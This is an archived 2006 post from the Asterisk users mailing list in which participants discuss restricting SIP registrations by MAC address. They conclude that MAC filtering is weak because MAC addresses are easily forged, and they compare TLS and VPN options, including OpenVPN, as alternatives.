[Asterisk-Users] hook into authentication

Steve Totaro stotaro at asteriskhelpdesk.com
Mon May 29 05:29:46 MST 2006 

trixter aka Bret McDanel wrote:
> On Sun, 2006-05-28 at 23:41 -0400, Steve Totaro wrote:
>   
>> Henry J. Cobb wrote:
>>     
>>>> to increase the security for remote extensions I would like to limit a
>>>> sip-peer to a specific MAC address. Is it possible to "hook into" the
>>>> authentication mechanism in asterisk and allow/deny incoming
>>>> registrations?
>>>>     
>>>>         
>>> This would be only mildly useful on the same subnet and completely useless
>>> over the internet.
>>>
>>> -HJC
>>>
>>>   
>>>       
>> I think it would work just fine over the internet using a bridged VPN.
>>     
>
> even on a local network this can be forged.  If you cant control the
> device that sends this information it is user supplied data, even over a
> vpn (which uses a virtual interface not the physical one).  It has the
> same value as any user supplied data - other than perhaps its additional
> data which makes guessing slightly harder.  
>
> TLS might be a better way to go since it would require a certificate
> that you can control the issuance of, but that certificate can be stolen
> and the remote end point would need to support the same scheme that you
> use (fortunately there are standards that make this easier with some
> devices but most dont implement this).  
>
> A vpn would provide security in that it would make it harder for someone
> to eavesdrop on the auth and attempt to derrive the password, however
> there is overhead associated with that.  At least 1 IP packet per real
> packet (sometimes more) on the network side, and the crypto parts on the
> cpu side.  For the server you would want to have a hardware based crypto
> card to deal with the VPN connections...
>   
I have had great luck with OpenVPN, any reason why you like hardware?  I 
find OpenVPN to be just as reliable and stable as any hardware VPN such 
as Cisco.  VPN will also make it very difficult to sniff or snoop on RTP 
streams if eavsdropping is a concern.  I even have OpenVPN running on a 
Linksys running OpenWRT and have rock solid connectivity unless there is 
a carrier issue out of my control. 

Forging a MAC address is trivial on most devices.  Forge a MAC address 
on a LAN (or bridged VPN) and you will quickly find that the conflict 
will cripple or cutoff your connectivity since switches will become 
confused where to send the packets and have funky arp entries.

Thanks,
Steve Totaro

More information about the asterisk-users mailing list